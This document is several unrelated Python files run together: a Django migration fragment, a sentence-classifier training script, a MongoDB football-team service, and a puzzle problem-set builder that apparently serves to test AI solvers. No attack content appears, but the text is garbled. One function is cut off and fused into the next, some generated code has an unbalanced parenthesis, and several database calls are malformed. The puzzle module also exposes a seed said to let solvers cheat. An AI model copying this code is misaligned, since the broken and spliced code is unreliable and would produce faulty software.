('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'whenUploaded': ('django.db.models.fields.DateTimeField', [], {}) }, 'boarddocs.annualreport': { 'Meta': {'object_name': 'Annualreport'}, 'endDate': ('django.db.models.fields.DateField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}), 'startDate': ('django.db.models.fields.DateField', [], {}), 'thefile': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'whenUploaded': ('django.db.models.fields.DateTimeField', [], {}) }, 'boarddocs.boardfile': { 'Meta': {'object_name': 'Boardfile'}, 'covering': ('django.db.models.fields.DateTimeField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}), 'thefile': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'whenUploaded': ('django.db.models.fields.DateTimeField', [], {}) }, 'boarddocs.budgetreport': { 'Meta': {'object_name': 'Budgetreport'}, 'endDate': ('django.db.models.fields.DateField', [], {}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}), 'startDate': ('django.db.models.fields.DateField', [], {}), 'thefile': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'whenUploaded': ('django.db.models.fields.DateTimeField', [], {}) }, 'boarddocs.historical': { 'Meta': {'object_name': 'Historical'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}), 'thefile': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'whenUploaded': ('django.db.models.fields.DateTimeField', [], {}) }, 'boarddocs.minutes': { 'Meta': {'object_name': 'Minutes'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'meetingDate': ('django.db.models.fields.DateTimeField', [], {}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'blank': 'True'}), 'thefile': ('django.db.models.fields.files.FileField', [], {'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}), 'whenUploaded': ('django.db.models.fields.DateTimeField', [], {}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) } } complete_apps = ['boarddocs'] 1-10 # !/usr/bin/env python # encoding: utf-8 # Copyright 2017-present, Facebook, Inc. # All rights reserved. 
# # This source code is licensed under the license found in the # LICENSE file in the root directory of this source tree. """Sentence classifier""" import argparse import json import os import sys import subprocess import logging from collections import defaultdict from termcolor import colored import random import numpy as np import torch from blamepipeline import DATA_DIR as DATA_ROOT from blamepipeline.claimclass import SentClassifier from blamepipeline.claimclass import utils, config logger = logging.getLogger() # ------------------------------------------------------------------------------ # Training arguments. # ------------------------------------------------------------------------------ # Defaults DATA_DIR = os.path.join(DATA_ROOT, 'datasets') MODEL_DIR = os.path.join(DATA_ROOT, 'models/claimclass') EMBED_DIR = os.path.join(DATA_ROOT, 'embeddings') def str2bool(v): return v.lower() in ('yes', 'true', 't', '1', 'y') def add_train_args(parser): """Adds commandline arguments pertaining to training a model. These are different from the arguments dictating the model architecture. """ parser.register('type', 'bool', str2bool) # Runtime environment runtime = parser.add_argument_group('Environment') runtime.add_argument('--no-cuda', type='bool', default=False, help='Train on CPU, even if GPUs are available.') runtime.add_argument('--gpu', type=int, default=0, help='Run on a specific GPU') runtime.add_argument('--data-workers', type=int, default=0, help='Number of subprocesses for data loading') runtime.add_argument('--parallel', type='bool', default=False, help='Use DataParallel on all available GPUs') runtime.add_argument('--random-seed', type=int, default=712, help=('Random seed for all numpy/torch/cuda ' 'operations (for reproducibility)')) runtime.add_argument('--num-epochs', type=int, default=25, help='Train data iterations') runtime.add_argument('--batch-size', type=int, default=50, help='Batch size for training') runtime.add_argument('--test-batch-size', type=int, default=50, help='Batch size during validation/testing') # Files files = parser.add_argument_group('Filesystem') files.add_argument('--model-dir', type=str, default=MODEL_DIR, help='Directory for saved models/checkpoints/logs') files.add_argument('--model-name', type=str, default='', help='Unique model identifier (.mdl, .txt, .checkpoint)') files.add_argument('--data-dir', type=str, default=DATA_DIR, help='Directory of training/validation data') files.add_argument('--train-file', type=str, default=None, help='train file') files.add_argument('--dev-file', type=str, default=None, help='dev file') files.add_argument('--test-file', type=str, default=None, help='test file') files.add_argument('--embed-dir', type=str, default=EMBED_DIR, help='Directory of pre-trained embedding files') files.add_argument('--embedding-file', type=str, choices=['word2vec', 'glove'], default=None, help='Space-separated pretrained embeddings file') files.add_argument('--valid-size', type=float, default=0, help='validation set ratio') # General general = parser.add_argument_group('General') general.add_argument('--display-iter', type=int, default=100, help='Log state after every batches') general.add_argument('--metrics', type=str, choices=['precision', 'recall', 'F1', 'acc'], help='metrics to display when training', nargs='+', default=['precision', 'recall', 'F1', 'acc']) general.add_argument('--valid-metric', type=str, default='F1', help='The evaluation metric used for model selection') # debug debug = parser.add_argument_group('Debug') 
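The `type='bool'` arguments above work because of the earlier `parser.register('type', 'bool', str2bool)` call; a minimal standalone illustration (the `--flag` option is made up):

import argparse

def str2bool(v):
    return v.lower() in ('yes', 'true', 't', '1', 'y')

p = argparse.ArgumentParser()
p.register('type', 'bool', str2bool)            # map the string 'bool' to the converter
p.add_argument('--flag', type='bool', default=False)
assert p.parse_args(['--flag', 'yes']).flag is True
assert p.parse_args(['--flag', 'no']).flag is False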
debug.add_argument('--debug', type='bool', default=False, help='Debug mode: only run 1/10 fold.') def set_defaults(args): """Make sure the commandline arguments are initialized properly.""" # Check critical files exist args.train_file = os.path.join(args.data_dir, args.train_file) if not os.path.isfile(args.train_file): raise IOError('No such file: %s' % args.train_file) if args.dev_file: args.dev_file = os.path.join(args.data_dir, args.dev_file) if not os.path.isfile(args.dev_file): raise IOError('No such file: %s' % args.dev_file) if args.test_file: args.test_file = os.path.join(args.data_dir, args.test_file) if not os.path.isfile(args.test_file): raise IOError('No such file: %s' % args.test_file) if args.embedding_file: args.embedding_file = 'w2v.googlenews.300d.txt' if args.embedding_file == 'word2vec' else 'glove.6B.300d.txt' args.embedding_file = os.path.join(args.embed_dir, args.embedding_file) if not os.path.isfile(args.embedding_file): raise IOError('No such file: %s' % args.embedding_file) # Set model directory subprocess.call(['mkdir', '-p', args.model_dir]) # Set model name if not args.model_name: import uuid import time args.model_name = time.strftime("%Y%m%d-") + str(uuid.uuid4())[:8] # Set log + model file names args.log_file = os.path.join(args.model_dir, args.model_name + '.txt') args.model_file = os.path.join(args.model_dir, args.model_name + '.mdl') # Embeddings options if args.embedding_file: with open(args.embedding_file) as f: dim = len(f.readline().strip().split(' ')) - 1 args.embedding_dim = dim elif not args.embedding_dim: raise RuntimeError('Either embedding_file or embedding_dim ' 'needs to be specified.') # Make sure fix_embeddings and embedding_file are consistent if args.fix_embeddings: if not args.embedding_file: logger.warning('WARN: fix_embeddings set to False ' 'as embeddings are random.') args.fix_embeddings = False return args # ------------------------------------------------------------------------------ # Initalization from scratch. # ------------------------------------------------------------------------------ def init_from_scratch(args, train_exs, dev_exs, test_exs): """New model, new data, new dictionary. """ # Build a dictionary from the data logger.info('-' * 100) logger.info('Build dictionary') word_dict = utils.build_word_dict(args, train_exs + dev_exs + test_exs) logger.info('Num words = %d' % len(word_dict)) # Initialize model model = SentClassifier(config.get_model_args(args), word_dict) # Load pretrained embeddings for words in dictionary if args.embedding_file: model.load_embeddings(word_dict.tokens(), args.embedding_file) return model # ------------------------------------------------------------------------------ # Train loop. # ------------------------------------------------------------------------------ def train(args, data_loader, model, global_stats): """Run through one epoch of model training with the provided data loader.""" # Initialize meters + timers train_loss = utils.AverageMeter() epoch_time = utils.Timer() # Run one epoch for idx, ex in enumerate(data_loader): loss, batch_size = model.update(ex) train_loss.update(loss, batch_size) # train_loss.update(*model.update(ex)) if idx % args.display_iter == 0: logger.info('train: Epoch = %d | iter = %d/%d | ' % (global_stats['epoch'], idx, len(data_loader)) + 'loss = %.2f | elapsed time = %.2f (s)' % (train_loss.avg, global_stats['timer'].time())) train_loss.reset() logger.info('train: Epoch %d done. 
Time for epoch = %.2f (s)' % (global_stats['epoch'], epoch_time.time())) # ------------------------------------------------------------------------------ # Validation loops. Includes functions that # use different metrics and implementations. # ------------------------------------------------------------------------------ def evaluate(pred, true, eps=1e-9): true_positive = (pred * true).sum().item() precision = true_positive / (pred.sum().item() + eps) recall = true_positive / (true.sum().item() + eps) F1 = 2 * (precision * recall) / (precision + recall + eps) acc = (pred == true).sum().item() / pred.size(0) return {'precision': precision, 'recall': recall, 'F1': F1, 'acc': acc} def validate(args, data_loader, model, global_stats, mode): """Run one full validation. """ eval_time = utils.Timer() # Make predictions examples = 0 preds = [] trues = [] for ex in data_loader: batch_size = ex[0].size(0) inputs = ex[:-1] pred = model.predict(inputs) true = ex[-1] preds.append(pred) trues.append(true) # If getting train accuracies, sample max 10k examples += batch_size if mode == 'train' and examples >= 1e4: break preds = torch.cat(preds, dim=0) trues = torch.cat(trues, dim=0) metrics = evaluate(preds, trues) logger.info(f'{mode} valid: Epoch = {global_stats["epoch"]} (best:{global_stats["best_epoch"]}) | ' + f'examples = {examples} | valid time = {eval_time.time():.2f} (s).') logger.info(' | '.join([f'{k}: {metrics[k]*100:.2f}%' for k in metrics])) return {args.valid_metric: metrics[args.valid_metric]} def train_valid_loop(train_loader, dev_loader, args, model, test_loader=None, fold=None): # -------------------------------------------------------------------------- # TRAIN/VALID LOOP logger.info('-' * 100) stats = {'timer': utils.Timer(), 'epoch': 0, 'best_valid': 0, 'best_epoch': 0} start_epoch = 0 for epoch in range(start_epoch, args.num_epochs): stats['epoch'] = epoch # Train train(args, train_loader, model, stats) # Validate train validate(args, train_loader, model, stats, mode='train') # Validate dev result = validate(args, dev_loader, model, stats, mode='dev') # Save best valid if result[args.valid_metric] > stats['best_valid']: logger.info( colored(f'Best valid: {args.valid_metric} = {result[args.valid_metric]*100:.2f}% ', 'yellow') + colored(f'(epoch {stats["epoch"]}, {model.updates} updates)', 'yellow')) fold_info = f'.fold_{fold}' if fold is not None else '' model.save(args.model_file + fold_info) stats['best_valid'] = result[args.valid_metric] stats['best_epoch'] = epoch logger.info('-' * 100) logger.info('Load best model...') model = SentClassifier.load(args.model_file + fold_info, args) device = torch.device(f"cuda:{args.gpu}" if args.cuda else "cpu") model.to(device) stats['epoch'] = stats['best_epoch'] if test_loader: test_result = validate(args, test_loader, model, stats, mode='test') else: test_result = validate(args, dev_loader, model, stats, mode=f'cv-{fold}') return test_result def initialize_model(train_exs, dev_exs, test_exs): # -------------------------------------------------------------------------- # MODEL logger.info('-' * 100) logger.info('Training model from scratch...') model = init_from_scratch(args, train_exs, dev_exs, test_exs) # Set up optimizer model.init_optimizer() # Use the GPU? device = torch.device(f"cuda:{args.gpu}" if args.cuda else "cpu") model.to(device) # Use multiple GPUs? if args.parallel: model.parallelize() return model # ------------------------------------------------------------------------------ # Main. 
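As a quick check on the metric arithmetic in evaluate() above (toy tensors, eps omitted for clarity):

import torch

pred = torch.tensor([1, 1, 0, 0])
true = torch.tensor([1, 0, 1, 0])
tp = (pred * true).sum().item()                      # 1 true positive
precision = tp / pred.sum().item()                   # 0.5
recall = tp / true.sum().item()                      # 0.5
f1 = 2 * precision * recall / (precision + recall)   # 0.5
acc = (pred == true).sum().item() / pred.size(0)     # 0.5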
# ------------------------------------------------------------------------------ def main(args): # -------------------------------------------------------------------------- # DATA logger.info('-' * 100) logger.info('Load data files') train_exs = utils.load_data(args.train_file) logger.info(f'Num train examples = {len(train_exs)}') if args.dev_file: dev_exs = utils.load_data(args.dev_file) logger.info(f'Num dev examples = {len(dev_exs)}') else: dev_exs = [] logger.info('No dev data. Randomly choose 10% of train data to validate.') if args.test_file: test_exs = utils.load_data(args.test_file) logger.info(f'Num test examples = {len(test_exs)}') else: test_exs = [] logger.info('No test data. Use 10 fold cv to evaluate.') logger.info(f'Total {len(train_exs) + len(dev_exs) + len(test_exs)} examples.') # ------------------------------------------------------------------------- # PRINT CONFIG logger.info('-' * 100) logger.info('CONFIG:\n%s' % json.dumps(vars(args), indent=4, sort_keys=True)) # -------------------------------------------------------------------------- # DATA ITERATORS logger.info('-' * 100) logger.info('Make data loaders') if args.test_file: model = initialize_model(train_exs, dev_exs, test_exs) train_loader, dev_loader, test_loader = utils.split_loader(train_exs, test_exs, args, model, dev_exs=dev_exs) result = train_valid_loop(train_loader, dev_loader, args, model, test_loader=test_loader)[args.valid_metric] logger.info('-' * 100) logger.info(f'Test {args.valid_metric}: {result*100:.2f}%') else: # 10-cross cv results = [] samples_fold = [np.random.randint(10) for _ in range(len(train_exs))] fold_samples = defaultdict(list) for sample_idx, sample_fold in enumerate(samples_fold): fold_samples[sample_fold].append(sample_idx) for fold in range(10): fold_info = f'for fold {fold}' if fold is not None else '' logger.info(colored(f'\nStarting training {fold_info}...\n', 'blue')) model = initialize_model(train_exs, dev_exs, test_exs) train_loader, dev_loader = utils.split_loader_cv( train_exs, args, model, fold_samples[fold], weighted=args.weighted_sampling) result = train_valid_loop(train_loader, dev_loader, args, model, fold=fold) results.append(result[args.valid_metric]) if args.debug: # DEBUG logger.debug(colored('DEBUG: Run for 1 folds. Stop.', 'red')) break result = np.mean(results).item() logger.info('-' * 100) logger.info(f'CV {args.valid_metric}: {result*100:.2f}%') if __name__ == '__main__': # Parse cmdline args and setup environment parser = argparse.ArgumentParser( 'Sentence Classifier', formatter_class=argparse.ArgumentDefaultsHelpFormatter ) add_train_args(parser) config.add_model_args(parser) args = parser.parse_args() set_defaults(args) # Set cuda args.cuda = not args.no_cuda and torch.cuda.is_available() # Set random state random.seed(args.random_seed) np.random.seed(args.random_seed) torch.manual_seed(args.random_seed) # this will **slower** the speed a lot, but enforce deterministic result for CNN model # torch.backends.cudnn.enabled = False # Set logging logger.setLevel(logging.DEBUG) fmt = logging.Formatter('%(asctime)s: [ %(message)s ]', '%m/%d/%Y %I:%M:%S %p') console = logging.StreamHandler() console.setFormatter(fmt) logger.addHandler(console) if args.log_file: logfile = logging.FileHandler(args.log_file, 'w') logfile.setFormatter(fmt) logger.addHandler(logfile) logger.info('COMMAND: %s' % ' '.join(sys.argv)) # Run! 
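The cross-validation branch of main() above assigns every training example to one of 10 folds at random and then trains once per fold; in miniature (sizes illustrative, and fold_samples[k] presumably holds the indices handed to split_loader_cv as that fold's validation set):

from collections import defaultdict
import numpy as np

n_examples = 25
samples_fold = [np.random.randint(10) for _ in range(n_examples)]
fold_samples = defaultdict(list)
for sample_idx, sample_fold in enumerate(samples_fold):
    fold_samples[sample_fold].append(sample_idx)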
main(args) DanielTal87/Football-Management-Tool0 #!/usr/bin/python3 from services.loggerServices.loggerService import LoggerService logger = LoggerService().logger def create_team(self, data): return self.client.FMT["teams"].insert_one(data).inserted_id def update_team(self, data): return self.client.FMT["teams"].update_one(data, upsert=True).inserted_id def update_team_with_draw(self, data, goals_scored, match_id): return self.client.FMT["teams"].update_one(data, {'$inc': {'number_of_scored_goals': int(goals_scored), 'number_of_received_goals': int(goals_scored), 'number_of_draws': 1}, '$push': {'matches_draw': match_id}}, upsert=False) def update_winning_team(self, data, goals_scored, goals_received, match_id): return self.client.FMT["teams"].update_one(data, {'$inc': {'number_of_scored_goals': int(goals_scored), 'number_of_received_goals': int(goals_received), 'number_of_wins': 1}, '$push': {'matches_wins': match_id}}, upsert=False) def update_losing_team(self, data, goals_scored, goals_received, match_id): return self.client.FMT["teams"].update_one(data, {'$inc': {'number_of_scored_goals': int(goals_scored), 'number_of_received_goals': int(goals_received), 'number_of_losses': 1}, '$push': {'matches_loss': match_id}}, upsert=False) def find_team(self, data): return self.client.FMT["teams"].find_one(data) def parse_team_from_request(request): return { "name": request.get("name"), "season": request.get("season") } def init_team(request): return { "name": request.get("name"), "season": request.get("season"), "number_of_wins": request.get("number_of_wins", 0), "matches_wins": request.get("matches_wins", []), "number_of_losses": request.get("number_of_losses", 0), "matches_loss": request.get("matches_loss", []), "number_of_draws": request.get("number_of_draws", 0), "matches_draw": request.get("matches_draw", []), "number_of_scored_goals": request.get("number_of_scored_goals", 0), "number_of_received_goals": request.get("number_of_received_goals", 0) } def find_team_most_scored(teams): return max(teams, key=lambda d: d['number_of_scored_goals']) def find_team_least_scored(teams): return min(teams, key=lambda d: d['number_of_scored_goals']) def find_team_most_wins(teams): return max(teams, key=lambda d: d['number_of_wins']) def find_team_least_wins(teams): return min(teams, key=lambda d: d['number_of_wins']) def parse_team_from_db(request): return { "id": str(request.get("_id")), "name": request.get("name"), "season": request.get("season"), "number_of_wins": request.get("number_of_wins", 0), "matches_wins": request.get("matches_wins", []), "number_of_losses": request.get("number_of_losses", 0), "matches_loss": request.get("matches_loss", []), "number_of_draws": request.get("number_of_draws", 0), "matches_draw": request.get("matches_draw", []), "number_of_scored_goals": request.get("number_of_scored_goals", 0), "number_of_received_goals": request.get("number_of_received_goals", 0) } """ A ProblemSet contains one or more (related) Problems. Each Problem has one or more Instances corresponding a to a different input. A "simple" problem like (lambda x: x + "world" == "Hello world") that has no inputs has just one instance, It is important that different ProblemSets do not overlap, in terms of duplicates or answers should not be given away, like if one had a weighted shortest path problem in one problem set and an unweighted shortest path in another, they should be combined into a single ProblemSet. This us useful for tests which involve giving away some solutions but not others. 
""" import inspect import json from typing import List, Dict, Callable, Set, Tuple import random import os import sys import traceback import time import utils # The seed used for randomness is important because if a solver has access to this seed it can cheat and # reverse-engineer the solutions to some puzzles. Don't share the seed with AI puzzle solvers :-) _AI_SEED = 12389484322359235125123212243523534510980967133563 DEFAULT_TIMEOUT = 1.0 # seconds PATH = os.path.join(utils.my_path, "problems/") class InterpreterError(Exception): pass def my_exec(cmd, globals=None, locals=None, description='source string'): """ https://stackoverflow.com/questions/28836078/how-to-get-the-line-number-of-an-error-from-exec-or-execfile-in-python """ try: exec(cmd, globals, locals) except SyntaxError as err: error_class = err.__class__.__name__ detail = err.args[0] if err.args else "" line_number = err.lineno except Exception as err: error_class = err.__class__.__name__ detail = err.args[0] if err.args else "" cl, exc, tb = sys.exc_info() line_number = traceback.extract_tb(tb)[-1][1] else: return cmd_str = "\n".join([f"{i + 1}: {x}" for i, x in enumerate(cmd.split("\n"))]) raise InterpreterError("%s at line %d of %s: %s\n%s" % (error_class, line_number, description, detail, cmd_str)) def type_str(ty: type) -> str: """ Convert type ty to string. :param ty: str, typing.List[int] , typing.List[typing.List[bool]], etc. :return: string form of type, "str", "List[int]" , "List[List[bool]]", etc. """ type_str = str(ty).replace("typing.", "") return type_str[8:-2] if type_str.startswith(" str: """ create code to output an object of type ty as a string :param var_name: The variable name, like "x" :param ty: str, typing.List[int] , typing.List[typing.List[bool]], etc. :return: code that writes the variable to standard out as a json object """ tys = type_str(ty) if tys.startswith("Set["): return "print(json.dumps({k : 1 for k in " + var_name + "})) # write sets as dictionaries\n" return f"print(json.dumps({var_name}))\n" def gen_type_assertion(var_name: str, ty: type) -> str: """ create code to assert type of var_name is ty :param var_name: The variable name, like "x" :param ty: str, List[int] , List[List[bool]], etc. 
:return: code that asserts that var_name is of type ty """ tys = type_str(ty) vars = [c for c in 'abcdefghijklmnop' if c != var_name][::-1] def helper(var_name, tys): tys = tys.strip() pre_bracket = tys.split("[")[0].lower() # part before [ (or the entire string if no bracket ans = f"type({var_name}) is {pre_bracket}" if "[" in tys: inside = tys[tys.index("[") + 1:-1] new_var = vars.pop() if pre_bracket == "list" or pre_bracket == "set": inside_check = helper(new_var, inside) # if " and " in inside_check: # inside_check = "(" + inside_check + ")" ans += f" and all({inside_check} for {new_var} in {var_name})" elif pre_bracket == "dict": depth = 0 for i, c in enumerate(inside): if c == "[": depth += 1 elif c == "]": depth -= 1 elif c == "," and depth == 0: break assert depth == 0 and c == ",", "Dict[(expecting comma inside)]" key_var = vars.pop() key_check = helper(key_var, tys[:i]) val_check = helper(new_var, tys[i + 1:]) ans += f" and all({key_check} and {val_check} for {key_var}, {new_var} in {var_name}.items())" else: assert False, f"Unknown type `{tys}`" return ans return f"assert {helper(var_name, tys)}, '{var_name} must be of type {tys}'" def gen_load_code(var_name: str, ty: type) -> str: """ create code to load an object of type ty as a string :param var_name: The variable name, like "x" :param ty: str, typing.List[int] , typing.List[typing.List[bool]], etc. :return: code that reads the variable from stdin as a json object """ tys = type_str(ty) if tys.startswith("Set["): assert tys.endswith("]") inside = tys[4:-1] ans = f"{var_name} = set(json.load(sys.stdin))) # convert set (stored as json dictionary)" assertions = [f"all(isinstance(x, {inside}) for x in {var_name})"] else: ans = f"{var_name} = json.load(sys.stdin)" num_lists = tys.count("List[") assert tys.startswith("List[" * num_lists) and tys.endswith("]" * num_lists) inside = tys[5 * num_lists: len(tys) - num_lists] if num_lists == 0: assertions = [f"isinstance({var_name}, {inside})"] else: assertions = [f"isinstance({var_name}, list)"] if num_lists == 1: assertions.append(f"all(isinstance(x, {inside}) for x in {var_name})") else: assertions.append(f"all(isinstance(x, list) for x in {var_name})") if num_lists == 2: assertions.append(f"all(isinstance(y, {inside}) for x in {var_name} for y in x)") elif num_lists == 3: assertions += [f"all(isinstance(y, list) for x in {var_name} for y in x)", f"all(isinstance(z, {inside}) for x in {var_name} for y in x for z in y)"] else: assert False, f'Unknown type {tys}' assert inside in ["int", "float", "bool", "str"], f'Unknown type {tys}' return ans + "\n\n" + "\n".join(f"assert {a}, 'Type error: expecting `{tys}`'" for a in assertions) def add_preamble(src): preamble = [] types = [] if "List[" in src: types.append("List") if "Set[" in src: types.append("Set") if types: preamble.append(f"from typing import {','.join(types)}") if "json." in src: preamble.append("import json") if "sys." 
in src: preamble.append("import sys") return "\n".join(preamble) + "\n" * 3 + src if preamble else src def gen_prob_code(var_name: str, var_type: type, prob_src: str, inputs: str): s = f"""{prob_src} {gen_load_code(var_name, var_type)} inputs = {inputs} assert problem({var_name}, **inputs) print("Success!") """ # import inspect # print(inspect.getsource(problem)) return add_preamble(s) def gen_sol_code(var_name: str, var_type: type, sol_src: str, inputs: str): s = f"""{sol_src} inputs = {inputs} {var_name} = solution(**inputs) {gen_dump_code(var_name, var_type)} """ return add_preamble(s) class BuilderRandom(random.Random): """Adds extra random functions useful for building instances.""" def __init__(self, seed=None): self._init_seed = seed super().__init__(seed) def reseed(self): self.seed(self._init_seed) def pseudo_word(self, min_len=1, max_len=20): w = "".join(self.choice(["text", "th", "ch", "qu", *"bcdfghjklmnprstvwxz"]) + self.choice("aeiyou") for _ in range(1 + max_len // 2)) return w[:self.randrange(min_len, max_len + 1)] def heavy_tail_float(self, lower=-1000.0, upper=1000.0, median_dev=1.0): # heavy tailed distribution mean = (lower + upper) / 2.0 trunc = (upper - lower) / 2.0 while True: r = (self.random() ** (-2) - 1) / 3 if self.randrange(2): r = -r x = mean - median_dev * r if abs(x - mean) <= trunc: return x def char(self, chars="0123456789abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ!"): return self.choice(chars) class ProblemSet: def __init__(self, name, summary=None, path=PATH): self.problems = [] # Problem's self.summary = summary self.name = name self.path = PATH self._already_tested = None # self.np_random = np.random.default_rng([ord(c) for c in seed]) def add(self, problem): self.problems.append(problem) def get_filename(self): return self.path and (os.path.join(self.path, self.name.split(".")[-1]) + ".json") def get_already_tested(self): if self._already_tested is None: try: js = utils.load_json(self.get_filename()) except: js = [] self._already_tested = {j["sat"]: {sol for sol in j["sols"]} for j in js} return self._already_tested def save(self): obj = [] for p in self.problems: for i in p.instances: z = {"name": i.name, "sat": i.src, "sols": i.sol_srcs} if p.timeout is not None and p.timeout != 1: z["timeout"] = p.timeout obj.append(z) filename = self.get_filename() if not filename: json.dumps(obj) # for debugging, just to make sure that it can be converted to json utils.warning(f"No path, not saving. 
{[len(p.instances) for p in self.problems]}") else: try: os.makedirs(self.path, exist_ok=True) with open(filename, "w") as f: json.dump(obj, f, indent=2) solved = sum((1 if i.sol_srcs else 0) for p in self.problems for i in p.instances) dur = sum(p.build_time for p in self.problems) utils.info(f"Solved {solved:5,}/{sum([len(p.instances) for p in self.problems]):5,} instances of " f"{len(self.problems):3,} probs in {dur:.2f}s => {filename}") except FileNotFoundError: utils.error(f"***Could not save {filename}, perhaps a path problem?") return # for e in self.problems[0].instances[:10]: # utils.debug(str(e)[:100]) def get_problems(globs: dict): seen = {Problem} # don't add abstract class Problem ans = [] for v in globs.values(): try: if v in seen: continue else: seen.add(v) except TypeError: continue try: is_prob = isinstance(v, Problem) except TypeError: is_prob = False if is_prob: ans.append(v) else: try: is_prob_class = issubclass(v, Problem) except TypeError: is_prob_class = False if is_prob_class: ans.append(v()) return ans def deep_copy(obj): t = type(obj) if t in {tuple, list, set}: return t(deep_copy(x) for x in obj) if t == dict: return {k: deep_copy(v) for k, v in obj.items()} return obj def get_type(obj, ignore_errors=False): # better than type(x) because it can do things like List[int], etc. try: t = type(obj) if t in {int, float, bool, complex, range, str}: return t assert t in {tuple, list, set, dict}, f"Unacceptable input type '{t}'" iterand_types = tuple(get_type(i) for i in obj) if t == tuple: return Tuple[iterand_types] assert len(iterand_types) > 0, "Cannot get type of empty list/set/dict" assert len(set(iterand_types)) == 1, "Lists/sets/dicts must be a single type" if t == list: return List[iterand_types[0]] if t == set: return Set[iterand_types[0]] if t == dict: val_types = [get_type(i) for i in obj.values()] assert len(set(val_types)) == 1, "Dict values must be a single type" return Dict[iterand_types[0], val_types[0]] except AssertionError: if ignore_errors: return None raise def decode(st: str): # small modifications to make json roundtrip work def helper(obj): if type(obj) in [int, str, float, bool]: return obj if type(obj) == list: if len(obj) == 2 and obj[0] == "__SET__:": return set(helper(obj[1])) return [helper(i) for i in obj] if type(obj) == dict: return {json.loads(k): helper(v) for k, v in obj.items()} assert False, f"Unexpected type {type(obj)}" return helper(json.loads(st)) def encode(obj): # small modifications to make json roundtrip work def helper(x): # encodes sets in a json-friendly fashion if type(x) in [int, str, float, bool]: return x if type(x) == list: return [helper(i) for i in x] if type(x) == set: return ["__SET__:", helper({i: 0 for i in x})] if type(x) == dict: return {json.dumps(k): helper(v) for k, v in x.items()} assert False, f"Unexpected type {type(x)}" return json.dumps(helper(obj)) class Instance: def __init__(self, src, name: str, timeout=None): self.src = src self.name = name # which Problem template did it come from? self.timeout = timeout self.sol_srcs = [] def add_test(self, sol_src, run_test=True): """Assert that the solution satisfies the given instance and add the solution to the instance. Do a round-trip json encoding/decoding to mimic the actual test and deter strange attacks. 
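A minimal sketch of that round trip using this module's encode()/decode() (values illustrative):

    assert decode(encode([[1, 2], [3]])) == [[1, 2], [3]]
    # sets survive the trip because encode() stores them as a ["__SET__:", {...}] pair
    assert decode(encode({1, 2, 3})) == {1, 2, 3}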
Ideally this could be done by running a protected process (like in evaluating programming contest submissions) but that is much slower so we will only add that later if the AI starts misbehaving.""" if sol_src in self.sol_srcs: # already added this solution return if run_test: env = dict(List=List, Dict=Dict, Set=Set) time0 = time.perf_counter() my_exec(sol_src + "\n" + "answer = sol()", env, description=self.name) assert env["answer"] is not None, "sol returned None" answer = decode(encode(env["answer"])) assert answer == env["answer"], "encode/decode round trip failed" env2 = dict(answer=answer, List=List, Dict=Dict, Set=Set) # in case they mucked with env my_exec(self.src + "\n" + "assert sat(answer)", env2, description=self.name) dur = time.perf_counter() - time0 if dur > (DEFAULT_TIMEOUT if self.timeout is None else self.timeout * DEFAULT_TIMEOUT): utils.warn(f"Took {dur}s to test {self.name} (self.timeout={self.timeout})") self.sol_srcs.append(sol_src) def unindent(docstr): lines = [line for line in docstr.strip().split("\n")] de_indent = None for i in range(1, len(lines)): line = lines[i] if de_indent is None and line.strip(): de_indent = len(line) - len(line.lstrip(" ")) if de_indent and len(line) > de_indent: assert not line[:de_indent].strip(), f"Weird indentation in docstring:\n{docstr}" lines[i] = line[de_indent:] return "\n".join(lines) class Problem: '''Problem is an abstract class for a problem template which builds 1 or more instances. Each problem MUST OVERRIDE sat. Examples from templates/hello.py: class HelloWorld(Problem): """Trivial example, no solutions provided""" @staticmethod def sat(s: str): return s + 'world' == 'Hello world' class BackWorlds(Problem): """Two solutions, no inputs""" @staticmethod def sat(s: str): return s[::-1] + 'world' == 'Hello world' @staticmethod def sol(): return 'olleH ' @staticmethod def sol2(): # solution methods must begin with 'sol' return 'Hello '[::-1] # With other inputs, the default values of the input are used to generate the first instance. 
